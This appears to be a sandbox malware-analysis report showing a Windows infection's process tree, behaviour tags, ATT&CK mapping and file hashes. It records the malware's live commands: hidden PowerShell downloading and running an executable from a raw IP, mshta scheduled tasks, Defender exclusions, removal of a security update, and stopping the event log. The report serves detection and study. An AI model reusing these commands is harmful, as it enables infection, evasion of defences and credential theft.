C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4932 /prefetch:86⤵PID:5300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5056,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5152 /prefetch:86⤵PID:5732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:86⤵PID:5828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:86⤵PID:5512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5124 /prefetch:86⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5072,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5080 /prefetch:26⤵
- Uses browser remote debugging
PID:6012
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1356 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedaeb46f8,0x7ffedaeb4708,0x7ffedaeb47186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:26⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:36⤵PID:5852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:86⤵PID:5776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:16⤵
- Uses browser remote debugging
PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:16⤵
- Uses browser remote debugging
PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:16⤵
- Uses browser remote debugging
PID:5356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,12188461046778653993,10326858191749099802,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:16⤵
- Uses browser remote debugging
PID:6136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Users\Admin\AppData\Local\.WindowTasks\Q8yTiDPzQaAiAnr5kv.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\VirtualStore\VirtDXPlBjAIqu.iso
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Microsoft\ShellKernelBridge.exe"C:/Users/Admin/AppData/Local/Microsoft/ShellKernelBridge.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1576
-
-
C:\Users\Admin\AppData\Roaming\Oracle\VirtualBoxNetworkBridge.exe"C:/Users/Admin/AppData/Roaming/Oracle/VirtualBoxNetworkBridge.exe"6⤵
- Executes dropped EXE
PID:1188
-
-
C:\Users\Admin\AppData\Local\DriverStore\winDriverChipsetService.exe"C:/Users/Admin/AppData/Local/DriverStore/winDriverChipsetService.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3948 -
C:\Users\Admin\AppData\Local\NhNotifSys\YoQVP7DxS.bin"C:\Users\Admin\AppData\Local\NhNotifSys\YoQVP7DxS.bin"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2472
-
-
C:\Users\Admin\AppData\Local\Temp\10086770101\45d3c59eed.exe"C:\Users\Admin\AppData\Local\Temp\10086770101\45d3c59eed.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn db0aAmawIEs /tr "mshta C:\Users\Admin\AppData\Local\Temp\lalwOVMVf.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn db0aAmawIEs /tr "mshta C:\Users\Admin\AppData\Local\Temp\lalwOVMVf.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\lalwOVMVf.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Users\Admin\AppData\Local\TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE"C:\Users\Admin\AppData\Local\TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5056
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10086780121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:4904 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:3576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:4820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "0fLuRmacfEG" /tr "mshta \"C:\Temp\6BrMpZXjK.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3920
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\6BrMpZXjK.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:8 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5868
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2532 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5184
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:724
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"4⤵
- Launches sc.exe
PID:5420
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"4⤵
- Launches sc.exe
PID:1444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"4⤵
- Launches sc.exe
PID:5680
-
-
-
C:\Users\Admin\AppData\Local\Temp\10087060101\8a847ea571.exe"C:\Users\Admin\AppData\Local\Temp\10087060101\8a847ea571.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\10087070101\886c72dbb9.exe"C:\Users\Admin\AppData\Local\Temp\10087070101\886c72dbb9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\10087080101\4e95b90fae.exe"C:\Users\Admin\AppData\Local\Temp\10087080101\4e95b90fae.exe"3⤵PID:8
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1436 -ip 14361⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
C:\Users\Admin\AppData\Roaming\d0HNrLB.exeC:\Users\Admin\AppData\Roaming\d0HNrLB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 8002⤵
- Program crash
PID:2316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2176 -ip 21761⤵PID:3384
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5308
-
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exeC:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5724 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1444
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1468
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4780
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Modify Authentication Process
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Modify Authentication Process
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114KB
MD553428880544e432e120393b0d29a9d98
SHA179e83052cec9e53ae844a0560e276d9d533266ff
SHA25677b1634d58777813a41a1742c4ebcd8fc77224d2ea338ad54addccc725ba8f84
SHA512531df37448081d2d3447f20dd2bf96d183019db3fbdfeab8ae7b6c63e8778864ada03518f63d7b7fa9633069a28ba0e343efc4e7e4c33a158012c7e9409c1398
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
288KB
MD59f0f920afbe1b71c04782159fc8ea46b
SHA1335445ce8f0080f5714dda5d287112110efabcb2
SHA2567af2ab90b7a6069f7f77042fc3ac57ccd3c9398ac6ed7d695813523165dac747
SHA5121c3d56145ef6a1b5ca801ac699e2c905eec32e2c49cd751dcfe711b22b780e978b24ad7456eddea9b97e815f9e724be83a61d58b9c98f5836c058d86512ec0c6
-
Filesize
7.1MB
MD599b83470c59482998d31bbe1b7fdddc8
SHA18ec7d092f6495d55cf216ff4c6fe90d8994d7146
SHA2560d8c4954c41c3fc4a7e08fa7346643b53b367f470a8ae611b8f0f2136477ad4c
SHA512d24ecbcc8cb15b54fb6ca4c7b83ada56d22e06467957c348ea27c0cdf1a9089ce9c5f4a89f0ee92494e7185f1b8b48fc1e0bb793320bc055f09a2314c8741544
-
Filesize
649B
MD57c30eee7d94e4a518e0a995e7de7bb70
SHA158a15355851cac221a984c31235c48aed5c2c6c7
SHA256609c8bed6a0928be46f4fb037792ca71ec36704f5b486c326f1aec8ed6ec6f81
SHA5120c4087145cf958043d59f0ebe2035443560c3a25a7e1d97cb47c45fa54bd17f0d271e503b0673163171ee3bb65e2283c0e565c062392bb030c556b62874f7744
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD539e376ee2f541e6b1ed0bca701e8fb59
SHA1bfe3cc2eed8721339d433533aef6e18e0a13a9a3
SHA25680eda1e4d8c05e257ff17ef734d606e67d8ab70b3e351430b2b231631eed5e04
SHA512a3f082c32857db0e3dec24394a259fff85e21b6a7b057ef55933504c23ec38cbb3237eb519d38385fc53cbc584c52aaf66291f44231245d9afee509a108a3350
-
Filesize
152B
MD539c51e5592e99966d676c729e840107b
SHA1e2dd9be0ffe54508a904d314b3cf0782a9a508b7
SHA25629f29a3495976b65de3df2d537628d260bc005da5956b262ff35e9f61d3d9ed3
SHA512b20532d0131b12603410c3cb425cb5df0ddc740f34e688455eff757802ffc854be771b30c3ff196e56b396c6fe53928a1577c8330b00f3f7b849fcf625e51bf4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4a751bf6-4707-4295-b721-8fbb4aa4e775.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
5KB
MD519cded147d2c3132647375c4de208619
SHA13867402594412cf36bfa6d03f07bc6a446b66045
SHA256417e8831a6cc5e48b32ce93ceb1b2c6d833346d4517ec1cacdc46736c973448e
SHA5121503e831e30920ebe3f36650b7f61040e882c2606f43db0ca6c30f8c7c7793fb1c734274492443a7bfaa123dcee6309b65e75032d0ee044ad6be08e7491c8d3d
-
